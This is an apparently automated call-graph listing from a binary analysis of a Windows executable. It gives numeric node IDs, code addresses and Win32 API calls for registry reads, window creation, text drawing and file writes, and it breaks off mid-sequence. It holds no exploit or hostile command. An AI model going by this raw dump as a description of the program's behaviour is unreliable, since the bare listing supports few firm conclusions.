API calls 53708->53713 53714 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53709->53714 53712->53707 53713->53704 53714->53704 53716 423a4d GetWindowLongA 53715->53716 53717 423a59 53715->53717 53716->53717 53718 4804c6 53719 4804cf 53718->53719 53720 4804fa 53718->53720 53719->53720 53721 4804ec 53719->53721 53723 480539 53720->53723 54160 47efb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53720->54160 54158 476b6c 188 API calls 53721->54158 53724 48055d 53723->53724 53727 480550 53723->53727 53728 480552 53723->53728 53730 480599 53724->53730 53731 48057b 53724->53731 53726 48052c 54161 47f018 42 API calls 53726->54161 53735 47eff4 42 API calls 53727->53735 54162 47f088 42 API calls 53728->54162 53729 4804f1 53729->53720 54159 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53729->54159 54165 47ee48 24 API calls 53730->54165 53736 480590 53731->53736 54163 47f018 42 API calls 53731->54163 53735->53724 54164 47ee48 24 API calls 53736->54164 53740 480597 53741 4805a9 53740->53741 53742 4805af 53740->53742 53743 4805ad 53741->53743 53844 47eff4 53741->53844 53742->53743 53744 47eff4 42 API calls 53742->53744 53849 47c3a4 53743->53849 53744->53743 54233 47eadc 42 API calls 53844->54233 53846 47f00f 54234 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53846->54234 54235 42d8a8 GetWindowsDirectoryA 53849->54235 53851 47c3c2 53852 403450 4 API calls 53851->53852 53853 47c3cf 53852->53853 54237 42d8d4 GetSystemDirectoryA 53853->54237 53855 47c3d7 53856 403450 4 API calls 53855->53856 53857 47c3e4 53856->53857 54239 42d900 53857->54239 53859 47c3ec 53860 403450 4 API calls 53859->53860 53861 47c3f9 53860->53861 53862 47c402 53861->53862 53863 47c41e 53861->53863 54295 42d218 53862->54295 53865 403400 4 API calls 53863->53865 53866 47c41c 53865->53866 53868 47c463 53866->53868 53870 42c8dc 5 API calls 53866->53870 54243 47c22c 53868->54243 53869 403450 4 API calls 53869->53866 53872 47c43e 53870->53872 53874 403450 4 API calls 53872->53874 53876 47c44b 53874->53876 53875 403450 4 API calls 53877 47c47f 53875->53877 53876->53868 53880 403450 4 API calls 53876->53880 53878 47c49d 53877->53878 53881 4035c0 4 API calls 53877->53881 53879 47c22c 8 API calls 53878->53879 53882 47c4ac 53879->53882 53880->53868 53881->53878 53883 403450 4 API calls 53882->53883 53884 47c4b9 53883->53884 53885 47c4e1 53884->53885 53886 42c40c 5 API calls 53884->53886 54158->53729 54160->53726 54161->53723 54162->53724 54163->53736 54164->53740 54165->53740 54233->53846 54236 42d8c9 54235->54236 54236->53851 54238 42d8f5 54237->54238 54238->53855 54240 403400 4 API calls 54239->54240 54241 42d910 GetModuleHandleA GetProcAddress 54240->54241 54242 42d929 54241->54242 54242->53859 54305 42de2c 54243->54305 54245 47c252 54246 47c256 54245->54246 54247 47c278 54245->54247 54308 42dd5c 54246->54308 54249 403400 4 API calls 54247->54249 54251 47c27f 54249->54251 54251->53875 54252 47c26d RegCloseKey 54252->54251 54253 403400 4 API calls 54253->54252 54296 4038a4 4 API calls 54295->54296 54297 42d22b 54296->54297 54298 42d242 GetEnvironmentVariableA 54297->54298 54302 42d255 54297->54302 54343 42dbe0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54297->54343 54298->54297 54299 42d24e 54298->54299 54301 403400 4 API calls 54299->54301 54301->54302 54302->53869 54306 42de37 54305->54306 54307 42de3d RegOpenKeyExA 54305->54307 54306->54307 54307->54245 54311 42dc10 54308->54311 54312 42dc36 RegQueryValueExA 54311->54312 54313 42dc7b 54312->54313 54318 42dc59 54312->54318 54314 403400 4 API calls 54313->54314 54316 42dd47 54314->54316 54315 42dc73 54317 403400 4 API calls 54315->54317 54316->54252 54316->54253 54317->54313 54318->54313 54318->54315 54319 4034e0 4 API calls 54318->54319 54328 403744 54318->54328 54319->54318 54321 42dcb0 RegQueryValueExA 54321->54312 54322 42dccc 54321->54322 54322->54313 54332 4038a4 54322->54332 54329 40374a 54328->54329 54331 40375b 54328->54331 54330 4034bc 4 API calls 54329->54330 54329->54331 54330->54331 54331->54321 54333 4038b1 54332->54333 54340 4038e1 54332->54340 54335 403400 4 API calls 54340->54335 54343->54297 56420 46be48 56421 46be7c 56420->56421 56457 46c254 56420->56457 56425 46bf14 56421->56425 56426 46bef2 56421->56426 56427 46bf03 56421->56427 56428 46bed0 56421->56428 56429 46bee1 56421->56429 56437 46beb8 56421->56437 56422 403400 4 API calls 56423 46c293 56422->56423 56433 403400 4 API calls 56423->56433 56756 46bdd8 45 API calls 56425->56756 56490 46ba08 56426->56490 56755 46bbc8 67 API calls 56427->56755 56470 46b758 56428->56470 56754 46b8c0 42 API calls 56429->56754 56436 46c29b 56433->56436 56437->56457 56525 468fe0 56437->56525 56438 46bf50 56439 494770 18 API calls 56438->56439 56456 46bf93 56438->56456 56438->56457 56439->56456 56441 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56441->56456 56442 46c0b6 56757 48300c 123 API calls 56442->56757 56445 46c0d1 56445->56457 56446 42cbd0 6 API calls 56446->56456 56447 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56447->56456 56449 46b2a0 23 API calls 56449->56456 56452 46c136 56453 457d58 24 API calls 56452->56453 56458 46c155 56453->56458 56454 46b2a0 23 API calls 56454->56457 56455 46c18e 56604 46b2a0 56455->56604 56456->56441 56456->56442 56456->56446 56456->56447 56456->56449 56456->56452 56456->56455 56456->56457 56466 46c17c 56456->56466 56528 468f1c 56456->56528 56536 46b00c 56456->56536 56543 46a26c 56456->56543 56681 482b0c 56456->56681 56766 46b514 19 API calls 56456->56766 56457->56422 56460 457d58 24 API calls 56458->56460 56460->56466 56461 46c19b 56462 46c1c4 SetActiveWindow 56461->56462 56463 46c1dc 56461->56463 56462->56463 56639 46a60c 56463->56639 56465 46c1ff 56465->56466 56467 46c21a 56465->56467 56466->56454 56767 414af8 56470->56767 56472 46b78a 56477 494770 18 API calls 56472->56477 56481 46b7cb 56472->56481 56473 46b7d1 56478 46b7f3 56473->56478 56482 46d6d0 21 API calls 56473->56482 56474 46b808 56475 46b814 GetCursor LoadCursorA SetCursor Sleep SetCursor 56474->56475 56476 46b83d 56474->56476 56475->56476 56776 47eadc 42 API calls 56476->56776 56477->56481 56771 414b28 56478->56771 56481->56473 56481->56474 56483 46b7e6 56482->56483 56486 403450 4 API calls 56483->56486 56484 46b806 56488 403400 4 API calls 56484->56488 56485 46b851 56485->56484 56487 414b28 4 API calls 56485->56487 56486->56478 56487->56484 56489 46b896 56488->56489 56489->56437 56777 46c6cc 56490->56777 56493 46bb8a 56495 403420 4 API calls 56493->56495 56494 414af8 4 API calls 56496 46ba56 56494->56496 56497 46bba4 56495->56497 56499 46bb76 56496->56499 56780 455f70 13 API calls 56496->56780 56498 403400 4 API calls 56497->56498 56500 46bbac 56498->56500 56499->56493 56502 403450 4 API calls 56499->56502 56503 403400 4 API calls 56500->56503 56502->56493 56504 46bbb4 56503->56504 56504->56437 56505 46bb39 56505->56493 56505->56499 56510 42cd58 7 API calls 56505->56510 56506 42cd58 7 API calls 56508 46bb12 56506->56508 56507 46bad9 56507->56493 56507->56505 56507->56506 56508->56505 56513 451444 4 API calls 56508->56513 56509 46ba74 56509->56507 56781 46696c 56509->56781 56512 46bb4f 56510->56512 56512->56499 56519 451444 4 API calls 56512->56519 56515 46bb29 56513->56515 56786 47eadc 42 API calls 56515->56786 56516 46696c 19 API calls 56518 46bab4 56516->56518 56520 451414 4 API calls 56518->56520 56521 46bb66 56519->56521 56522 46bac9 56520->56522 56787 47eadc 42 API calls 56521->56787 56785 47eadc 42 API calls 56522->56785 56526 468f1c 19 API calls 56525->56526 56527 468fef 56526->56527 56527->56438 56530 468f4b 56528->56530 56529 4078fc 19 API calls 56531 468f84 56529->56531 56530->56529 56533 468f8c 56530->56533 56902 453330 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56531->56902 56534 403400 4 API calls 56533->56534 56535 468fa4 56534->56535 56535->56456 56537 46b01d 56536->56537 56538 46b018 56536->56538 56988 469dec 46 API calls 56537->56988 56542 46b01b 56538->56542 56903 46aa78 56538->56903 56540 46b025 56540->56456 56542->56456 56544 403400 4 API calls 56543->56544 56545 46a299 56544->56545 57011 47d9bc 56545->57011 56547 46a2f8 56548 46a315 56547->56548 56549 46a2fc 56547->56549 56551 46a306 56548->56551 57021 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56548->57021 57018 466b6c 56549->57018 56553 46a5a9 56551->56553 56556 46a434 56551->56556 56557 46a49f 56551->56557 56554 403420 4 API calls 56553->56554 56558 46a5d3 56554->56558 56555 46a331 56555->56551 56559 46a339 56555->56559 56560 403494 4 API calls 56556->56560 56561 403494 4 API calls 56557->56561 56558->56456 56563 46b2a0 23 API calls 56559->56563 56564 46a441 56560->56564 56562 46a4ac 56561->56562 56566 40357c 4 API calls 56562->56566 56573 46a346 56563->56573 56565 40357c 4 API calls 56564->56565 56567 46a44e 56565->56567 56568 46a4b9 56566->56568 56569 40357c 4 API calls 56567->56569 56570 40357c 4 API calls 56568->56570 56571 46a45b 56569->56571 56572 46a4c6 56570->56572 56574 40357c 4 API calls 56571->56574 56575 40357c 4 API calls 56572->56575 56578 46a387 56573->56578 56579 46a36f SetActiveWindow 56573->56579 56576 46a468 56574->56576 56577 46a4d3 56575->56577 56580 466b6c 20 API calls 56576->56580 56581 40357c 4 API calls 56577->56581 57022 42f570 56578->57022 56579->56578 56582 46a476 56580->56582 56583 46a4e1 56581->56583 56585 40357c 4 API calls 56582->56585 56586 414b28 4 API calls 56583->56586 56588 46a47f 56585->56588 56589 46a49d 56586->56589 56591 40357c 4 API calls 56588->56591 57039 466ea4 56589->57039 56594 46a48c 56591->56594 56593 46a3d8 56596 46b11c 21 API calls 56593->56596 56595 414b28 4 API calls 56594->56595 56595->56589 56597 46a40a 56596->56597 56597->56456 56605 468fe0 19 API calls 56604->56605 56606 46b2b8 56605->56606 56607 46b2da 56606->56607 56608 465638 7 API calls 56606->56608 57158 465638 56607->57158 56608->56607 56612 46b2f2 56613 46b11c 21 API calls 56612->56613 56614 46b32a 56613->56614 56615 414b28 4 API calls 56614->56615 56616 46b33e 56615->56616 56617 46b374 56616->56617 56618 46b34a 56616->56618 56621 46b393 56617->56621 56622 46b3bd 56617->56622 56619 414b28 4 API calls 56618->56619 56620 46b35e 56619->56620 56624 414b28 4 API calls 56620->56624 56625 414b28 4 API calls 56621->56625 56623 414b28 4 API calls 56622->56623 56626 46b3d1 56623->56626 56627 46b372 56624->56627 56628 46b3a7 56625->56628 56629 414b28 4 API calls 56626->56629 57175 46b034 56627->57175 56630 414b28 4 API calls 56628->56630 56629->56627 56630->56627 56634 468fe0 19 API calls 56637 46b46f 56634->56637 56635 46b40f 56635->56634 56636 46b4d2 56636->56461 56637->56636 57180 4946bc 18 API calls 56637->57180 56641 46a637 56639->56641 56640 46a66e 56643 46a7e3 56640->56643 56657 46a682 56640->56657 56641->56640 57200 47dc30 56641->57200 56644 46a95a 56643->56644 56647 46a817 56643->56647 56653 46a801 56643->56653 56645 403400 4 API calls 56644->56645 56649 46a97f 56645->56649 56646 46a7c0 56650 46a7db 56646->56650 56655 402660 4 API calls 56646->56655 56648 414b28 4 API calls 56647->56648 56654 46a815 56648->56654 56649->56465 56650->56465 56651 402660 4 API calls 56651->56657 56652 402648 4 API calls 56652->56657 56658 414b28 4 API calls 56653->56658 57212 495520 MulDiv 56654->57212 56655->56650 56656 46a78c 56660 457d58 24 API calls 56656->56660 56657->56651 56657->56652 56666 46a6f5 56657->56666 56658->56654 56660->56646 56661 46a838 56663 457d58 24 API calls 56663->56666 56666->56646 56666->56656 56666->56663 56668 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56666->56668 57211 403ba4 7 API calls 56666->57211 56668->56666 56682 46c6cc 48 API calls 56681->56682 56683 482b4f 56682->56683 56684 482b58 56683->56684 57428 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56683->57428 56686 414af8 4 API calls 56684->56686 56687 482b68 56686->56687 56688 403450 4 API calls 56687->56688 56689 482b75 56688->56689 57238 46ca24 56689->57238 56692 482b85 56693 414af8 4 API calls 56692->56693 56695 482b95 56693->56695 56696 403450 4 API calls 56695->56696 56697 482ba2 56696->56697 56698 469bd4 SendMessageA 56697->56698 56699 482bbb 56698->56699 56700 482c0c 56699->56700 57430 479c64 23 API calls 56699->57430 56701 4241ec 11 API calls 56700->56701 56703 482c16 56701->56703 56704 482c3c 56703->56704 56705 482c27 SetActiveWindow 56703->56705 57267 481f3c 56704->57267 56705->56704 56754->56437 56755->56437 56756->56437 56757->56445 56766->56456 56768 414b06 56767->56768 56769 4034e0 4 API calls 56768->56769 56770 414b13 56769->56770 56770->56472 56772 414af8 4 API calls 56771->56772 56773 414b4c 56772->56773 56774 403400 4 API calls 56773->56774 56775 414b7d 56774->56775 56775->56484 56776->56485 56788 46c764 56777->56788 56780->56509 56782 466986 56781->56782 56783 4078fc 19 API calls 56782->56783 56784 4669c1 56783->56784 56784->56516 56785->56507 56786->56505 56787->56499 56789 414af8 4 API calls 56788->56789 56790 46c798 56789->56790 56849 466c04 56790->56849 56793 414b28 4 API calls 56794 46c7aa 56793->56794 56795 46c7b9 56794->56795 56797 46c7d2 56794->56797 56878 47eadc 42 API calls 56795->56878 56800 46c819 56797->56800 56801 46c800 56797->56801 56798 403420 4 API calls 56799 46ba3a 56798->56799 56799->56493 56799->56494 56802 46c87e 56800->56802 56815 46c81d 56800->56815 56879 47eadc 42 API calls 56801->56879 56881 42cb5c CharNextA 56802->56881 56805 46c88d 56806 46c891 56805->56806 56809 46c8aa 56805->56809 56882 47eadc 42 API calls 56806->56882 56808 46c865 56880 47eadc 42 API calls 56808->56880 56810 46c8ce 56809->56810 56858 466d74 56809->56858 56883 47eadc 42 API calls 56810->56883 56815->56808 56815->56809 56818 46c8e7 56819 403778 4 API calls 56818->56819 56820 46c8fd 56819->56820 56866 42c9ac 56820->56866 56823 46c90e 56884 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56823->56884 56824 46c93f 56826 42c8dc 5 API calls 56824->56826 56828 46c94a 56826->56828 56827 46c921 56829 451444 4 API calls 56827->56829 56830 42c40c 5 API calls 56828->56830 56831 46c92e 56829->56831 56832 46c955 56830->56832 56885 47eadc 42 API calls 56831->56885 56834 42cbd0 6 API calls 56832->56834 56836 46c960 56834->56836 56835 46c7cd 56835->56798 56870 46c6f8 56836->56870 56838 46c968 56839 42cd58 7 API calls 56838->56839 56840 46c970 56839->56840 56841 46c974 56840->56841 56842 46c98a 56840->56842 56886 47eadc 42 API calls 56841->56886 56842->56835 56844 46c994 56842->56844 56845 46c99c GetDriveTypeA 56844->56845 56845->56835 56846 46c9a7 56845->56846 56887 47eadc 42 API calls 56846->56887 56852 466c1e 56849->56852 56851 42cbd0 6 API calls 56851->56852 56852->56851 56853 403450 4 API calls 56852->56853 56854 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56852->56854 56855 466c67 56852->56855 56888 42cabc 56852->56888 56853->56852 56854->56852 56856 403420 4 API calls 56855->56856 56857 466c81 56856->56857 56857->56793 56859 466d7e 56858->56859 56860 466d91 56859->56860 56899 42cb4c CharNextA 56859->56899 56860->56810 56862 466da4 56860->56862 56864 466dae 56862->56864 56863 466ddb 56863->56810 56863->56818 56864->56863 56900 42cb4c CharNextA 56864->56900 56867 42ca05 56866->56867 56868 42c9c2 56866->56868 56867->56823 56867->56824 56868->56867 56901 42cb4c CharNextA 56868->56901 56871 46c75d 56870->56871 56872 46c70b 56870->56872 56871->56838 56872->56871 56873 41eeb4 2 API calls 56872->56873 56874 46c71b 56873->56874 56875 46c735 SHPathPrepareForWriteA 56874->56875 56876 41ef68 6 API calls 56875->56876 56877 46c755 56876->56877 56877->56838 56878->56835 56879->56835 56880->56835 56881->56805 56882->56835 56883->56835 56884->56827 56885->56835 56886->56835 56889 403494 4 API calls 56888->56889 56892 42cacc 56889->56892 56890 403744 4 API calls 56890->56892 56892->56890 56894 42cb02 56892->56894 56897 42c454 IsDBCSLeadByte 56892->56897 56893 42cb46 56893->56852 56894->56893 56896 4037b8 4 API calls 56894->56896 56898 42c454 IsDBCSLeadByte 56894->56898 56896->56894 56897->56892 56898->56894 56899->56859 56900->56864 56901->56868 56902->56533 56905 46aabf 56903->56905 56904 46af37 56906 46af52 56904->56906 56907 46af83 56904->56907 56905->56904 56908 46ab7a 56905->56908 56911 403494 4 API calls 56905->56911 56910 403494 4 API calls 56906->56910 56912 403494 4 API calls 56907->56912 56909 46ab9b 56908->56909 56913 46abdc 56908->56913 56914 403494 4 API calls 56909->56914 56915 46af60 56910->56915 56916 46aafe 56911->56916 56917 46af91 56912->56917 56921 403400 4 API calls 56913->56921 56918 46aba9 56914->56918 57006 4694c8 12 API calls 56915->57006 56920 414af8 4 API calls 56916->56920 57007 4694c8 12 API calls 56917->57007 56923 414af8 4 API calls 56918->56923 56924 46ab1f 56920->56924 56925 46abda 56921->56925 56927 46abca 56923->56927 56928 403634 4 API calls 56924->56928 56946 46acc0 56925->56946 56989 469bd4 56925->56989 56926 46af6e 56929 403400 4 API calls 56926->56929 56932 403634 4 API calls 56927->56932 56933 46ab2f 56928->56933 56930 46afb4 56929->56930 56935 403400 4 API calls 56930->56935 56931 46ad48 56937 403400 4 API calls 56931->56937 56932->56925 56936 414af8 4 API calls 56933->56936 56941 46afbc 56935->56941 56942 46ab43 56936->56942 56943 46ad46 56937->56943 56938 46abfc 56939 46ac02 56938->56939 56940 46ac3a 56938->56940 56944 403494 4 API calls 56939->56944 56947 403400 4 API calls 56940->56947 56945 403420 4 API calls 56941->56945 56942->56908 56952 414af8 4 API calls 56942->56952 57001 46a010 43 API calls 56943->57001 56948 46ac10 56944->56948 56949 46afc9 56945->56949 56946->56931 56950 46ad07 56946->56950 56951 46ac38 56947->56951 56954 47bfd8 43 API calls 56948->56954 56949->56542 56955 403494 4 API calls 56950->56955 56995 469ec8 56951->56995 56956 46ab6a 56952->56956 56958 46ac28 56954->56958 56959 46ad15 56955->56959 56960 403634 4 API calls 56956->56960 56957 46ad71 56966 46add2 56957->56966 56967 46ad7c 56957->56967 56961 403634 4 API calls 56958->56961 56962 414af8 4 API calls 56959->56962 56960->56908 56961->56951 56964 46ad36 56962->56964 56968 403634 4 API calls 56964->56968 56965 46ac61 56971 46acc2 56965->56971 56972 46ac6c 56965->56972 56969 403400 4 API calls 56966->56969 56970 403494 4 API calls 56967->56970 56968->56943 56973 46adda 56969->56973 56978 46ad8a 56970->56978 56975 403400 4 API calls 56971->56975 56974 403494 4 API calls 56972->56974 56976 46add0 56973->56976 56983 46ae83 56973->56983 56980 46ac7a 56974->56980 56975->56946 56976->56973 57002 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56976->57002 56978->56973 56978->56976 56982 403634 4 API calls 56978->56982 56979 46adfd 56979->56983 57003 49490c 18 API calls 56979->57003 56980->56946 56984 403634 4 API calls 56980->56984 56982->56978 57004 429104 SendMessageA 56983->57004 56984->56980 56986 46af24 57005 429154 SendMessageA SendMessageA 56986->57005 56988->56540 57008 42a050 SendMessageA 56989->57008 56991 469be3 56992 469c03 56991->56992 57009 42a050 SendMessageA 56991->57009 56992->56938 56994 469bf3 56994->56938 56999 469ef5 56995->56999 56996 469f57 56997 403400 4 API calls 56996->56997 56998 469f6c 56997->56998 56998->56965 56999->56996 57010 469e4c 43 API calls 56999->57010 57001->56957 57002->56979 57003->56983 57004->56986 57005->56904 57006->56926 57007->56926 57008->56991 57009->56994 57010->56999 57012 47d9cf 57011->57012 57015 47da0c 57011->57015 57043 455cf8 57012->57043 57015->56547 57017 47da1f 57017->56547 57098 466a80 57018->57098 57021->56555 57023 42f57c 57022->57023 57024 42f59f GetActiveWindow GetFocus 57023->57024 57025 41eeb4 2 API calls 57024->57025 57026 42f5b6 57025->57026 57027 42f5d3 57026->57027 57028 42f5c3 RegisterClassA 57026->57028 57029 42f662 SetFocus 57027->57029 57030 42f5e1 CreateWindowExA 57027->57030 57028->57027 57032 403400 4 API calls 57029->57032 57030->57029 57031 42f614 57030->57031 57119 42428c 57031->57119 57034 42f67e 57032->57034 57038 49490c 18 API calls 57034->57038 57035 42f63c 57036 42f644 CreateWindowExA 57035->57036 57036->57029 57037 42f65a ShowWindow 57036->57037 57037->57029 57038->56593 57125 44b524 57039->57125 57041 466eab 57044 455d09 57043->57044 57045 455d16 57044->57045 57046 455d0d 57044->57046 57077 455adc 29 API calls 57045->57077 57069 4559fc 57046->57069 57049 455d13 57049->57015 57050 47d628 57049->57050 57056 47d726 57050->57056 57058 47d665 57050->57058 57051 47d6c9 57052 403420 4 API calls 57051->57052 57053 47d80e 57052->57053 57053->57017 57055 47954c 19 API calls 57055->57056 57056->57051 57056->57055 57062 47d77c 57056->57062 57057 4797f0 4 API calls 57057->57058 57058->57051 57058->57056 57058->57057 57061 47bfd8 43 API calls 57058->57061 57067 47d6d2 57058->57067 57086 47968c 57058->57086 57059 47bfd8 43 API calls 57059->57062 57060 4540ec 20 API calls 57060->57062 57061->57058 57062->57056 57062->57059 57062->57060 57064 47d713 57062->57064 57063 47bfd8 43 API calls 57063->57067 57064->57051 57065 42c93c 5 API calls 57065->57067 57066 42c964 5 API calls 57066->57067 57067->57058 57067->57063 57067->57064 57067->57065 57067->57066 57097 47d334 52 API calls 57067->57097 57070 42de2c RegOpenKeyExA 57069->57070 57071 455a19 57070->57071 57072 455a67 57071->57072 57078 455930 57071->57078 57072->57049 57075 455930 6 API calls 57076 455a48 RegCloseKey 57075->57076 57076->57049 57077->57049 57083 42dd68 57078->57083 57080 403420 4 API calls 57081 4559e2 57080->57081 57081->57075 57082 455958 57082->57080 57084 42dc10 6 API calls 57083->57084 57085 42dd71 57084->57085 57085->57082 57087 4796a2 57086->57087 57088 47969e 57086->57088 57089 403450 4 API calls 57087->57089 57088->57058 57090 4796af 57089->57090 57091 4796b5 57090->57091 57092 4796cf 57090->57092 57093 47954c 19 API calls 57091->57093 57094 47954c 19 API calls 57092->57094 57095 4796cb 57093->57095 57094->57095 57096 403400 4 API calls 57095->57096 57096->57088 57097->57067 57099 403494 4 API calls 57098->57099 57100 466aae 57099->57100 57101 42dbd8 5 API calls 57100->57101 57102 466ac0 57101->57102 57103 42dbd8 5 API calls 57102->57103 57104 466ad2 57103->57104 57105 46696c 19 API calls 57104->57105 57106 466adc 57105->57106 57107 42dbd8 5 API calls 57106->57107 57108 466aeb 57107->57108 57115 4669e4 57108->57115 57111 42dbd8 5 API calls 57112 466b04 57111->57112 57113 403400 4 API calls 57112->57113 57114 466b19 57113->57114 57114->56551 57116 466a04 57115->57116 57117 4078fc 19 API calls 57116->57117 57118 466a4e 57117->57118 57118->57111 57120 4242be 57119->57120 57121 42429e GetWindowTextA 57119->57121 57123 403494 4 API calls 57120->57123 57122 4034e0 4 API calls 57121->57122 57124 4242bc 57122->57124 57123->57124 57124->57035 57128 44b39c 57125->57128 57127 44b537 57127->57041 57129 44b3cf 57128->57129 57130 414af8 4 API calls 57129->57130 57131 44b3e2 57130->57131 57132 40357c 4 API calls 57131->57132 57133 44b40f 73A1A570 57131->57133 57132->57133 57139 41a1f8 57133->57139 57136 44b440 57147 44b0d0 57136->57147 57138 44b454 73A1A480 57138->57127 57140 41a223 57139->57140 57141 41a2bf 57139->57141 57144 403520 4 API calls 57140->57144 57142 403400 4 API calls 57141->57142 57143 41a2d7 SelectObject 57142->57143 57143->57136 57145 41a27b 57144->57145 57146 41a2b3 CreateFontIndirectA 57145->57146 57146->57141 57148 44b0e7 57147->57148 57149 44b17a 57148->57149 57150 44b163 57148->57150 57151 44b0fa 57148->57151 57149->57138 57152 44b173 DrawTextA 57150->57152 57151->57149 57153 402648 4 API calls 57151->57153 57152->57149 57154 44b10b 57153->57154 57155 44b129 MultiByteToWideChar DrawTextW 57154->57155 57161 465643 57158->57161 57159 46571e 57169 4673f8 57159->57169 57160 4656d6 57160->57159 57187 4185c8 7 API calls 57160->57187 57161->57159 57164 465693 57161->57164 57181 421a2c 57161->57181 57164->57160 57165 4656cd 57164->57165 57166 4656d8 57164->57166 57167 421a2c 7 API calls 57165->57167 57168 421a2c 7 API calls 57166->57168 57167->57160 57168->57160 57170 467428 57169->57170 57171 467409 57169->57171 57170->56612 57172 414b28 4 API calls 57171->57172 57173 467417 57172->57173 57174 414b28 4 API calls 57173->57174 57174->57170 57177 46b041 57175->57177 57176 421a2c 7 API calls 57178 46b0cc 57176->57178 57177->57176 57178->56635 57179 466ecc 18 API calls 57178->57179 57179->56635 57180->56636 57182 421a84 57181->57182 57186 421a3a 57181->57186 57182->57164 57183 421a69 57183->57182 57196 421d38 SetFocus GetFocus 57183->57196 57186->57183 57188 408cc4 57186->57188 57187->57159 57189 408cd0 57188->57189 57197 406df4 LoadStringA 57189->57197 57192 403450 4 API calls 57193 408d01 57192->57193 57194 403400 4 API calls 57193->57194 57195 408d16 57194->57195 57195->57183 57196->57182 57198 4034e0 4 API calls 57197->57198 57199 406e21 57198->57199 57199->57192 57201 402648 4 API calls 57200->57201 57202 47dc4c 57201->57202 57203 47d628 61 API calls 57202->57203 57204 47dc6b 57203->57204 57210 47dc7f 57204->57210 57216 47da48 57204->57216 57206 47dcab 57208 402660 4 API calls 57208->57210 57210->57206 57210->57208 57211->56666 57212->56661 57217 403494 4 API calls 57216->57217 57239 46ca4d 57238->57239 57240 414af8 4 API calls 57239->57240 57251 46ca9a 57239->57251 57241 46ca63 57240->57241 57437 466c90 6 API calls 57241->57437 57242 403420 4 API calls 57244 46cb44 57242->57244 57244->56692 57429 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 57244->57429 57245 46ca6b 57246 414b28 4 API calls 57245->57246 57247 46ca79 57246->57247 57248 46ca86 57247->57248 57250 46ca9f 57247->57250 57438 47eadc 42 API calls 57248->57438 57252 46cab7 57250->57252 57253 466d74 CharNextA 57250->57253 57251->57242 57439 47eadc 42 API calls 57252->57439 57255 46cab3 57253->57255 57255->57252 57256 46cacd 57255->57256 57257 46cad3 57256->57257 57258 46cae9 57256->57258 57440 47eadc 42 API calls 57257->57440 57260 42c9ac CharNextA 57258->57260 57261 46caf6 57260->57261 57261->57251 57441 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57261->57441 57263 46cb0d 57264 451444 4 API calls 57263->57264 57265 46cb1a 57264->57265 57442 47eadc 42 API calls 57265->57442 57268 481f5f 57267->57268 57270 481f8d 57267->57270 57443 4946bc 18 API calls 57268->57443 57271 475dbc 57270->57271 57272 457b4c 24 API calls 57271->57272 57273 475e08 57272->57273 57274 4072b0 SetCurrentDirectoryA 57273->57274 57275 475e12 57274->57275 57444 46e5b0 57275->57444 57430->56700 57437->57245 57438->57251 57439->57251 57440->57251 57441->57263 57442->57251 57443->57270 57445 46e623 57444->57445 57447 46e5cd 57444->57447 57448 46e628 57445->57448 57446 47968c 19 API calls 57446->57447 57447->57445 57447->57446 57449 46e64e 57448->57449 57892 44fb08 57449->57892 57895 44fb1c 57892->57895 57896 44fb2d 57895->57896 57897 44fb19 57896->57897 57898 44fb57 MulDiv 57896->57898 58948 416b52 58949 416bfa 58948->58949 58950 416b6a 58948->58950 58967 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58949->58967 58952 416b84 SendMessageA 58950->58952 58953 416b78 58950->58953 58954 416bd8 58952->58954 58955 416b82 CallWindowProcA 58953->58955 58956 416b9e 58953->58956 58955->58954 58964 41a068 GetSysColor 58956->58964 58959 416ba9 SetTextColor 58960 416bbe 58959->58960 58965 41a068 GetSysColor 58960->58965 58962 416bc3 SetBkColor 58966 41a6f0 GetSysColor CreateBrushIndirect 58962->58966 58964->58959 58965->58962 58966->58954 58967->58954 58968 416654 58969 416661 58968->58969 58970 4166bb 58968->58970 58976 416560 CreateWindowExA 58969->58976 58977 4162da 58969->58977 58971 416668 SetPropA SetPropA 58971->58970 58972 41669b 58971->58972 58973 4166ae SetWindowPos 58972->58973 58973->58970 58976->58971 58978 416306 58977->58978 58979 4162e6 GetClassInfoA 58977->58979 58978->58971 58979->58978 58980 4162fa GetClassInfoA 58979->58980 58980->58978 58981 4413a4 58982 4413bb WriteFile 58981->58982 58983 4413ad 58981->58983 58984 4413c6 58982->58984 58983->58982 58983->58983 58985 48042c 58990 450ff0 58985->58990 58987 480440 59000 47f518 58987->59000 58989 480464 58991 450ffd 58990->58991 58993 451051 58991->58993 59006 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58991->59006 58994 450e74 InterlockedExchange 58993->58994 58995 451063 58994->58995 58997 451079 58995->58997 59007 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58995->59007 58998 4510bc 58997->58998 59008 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58997->59008 58998->58987 59009 40b5c8 59000->59009 59002 47f585 59002->58989 59003 4069e4 4 API calls 59005 47f53a 59003->59005 59005->59002 59005->59003 59013 4768b0 59005->59013 59006->58993 59007->58997 59008->58998 59010 40b5d3 59009->59010 59011 40b5f3 59010->59011 59029 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59010->59029 59011->59005 59022 47692a 59013->59022 59026 4768e1 59013->59026 59014 476975 59030 451280 59014->59030 59016 47698c 59018 403420 4 API calls 59016->59018 59017 4038a4 4 API calls 59017->59026 59020 4769a6 59018->59020 59019 4038a4 4 API calls 59019->59022 59020->59005 59021 403450 4 API calls 59021->59026 59022->59014 59022->59019 59024 403744 4 API calls 59022->59024 59025 403450 4 API calls 59022->59025 59028 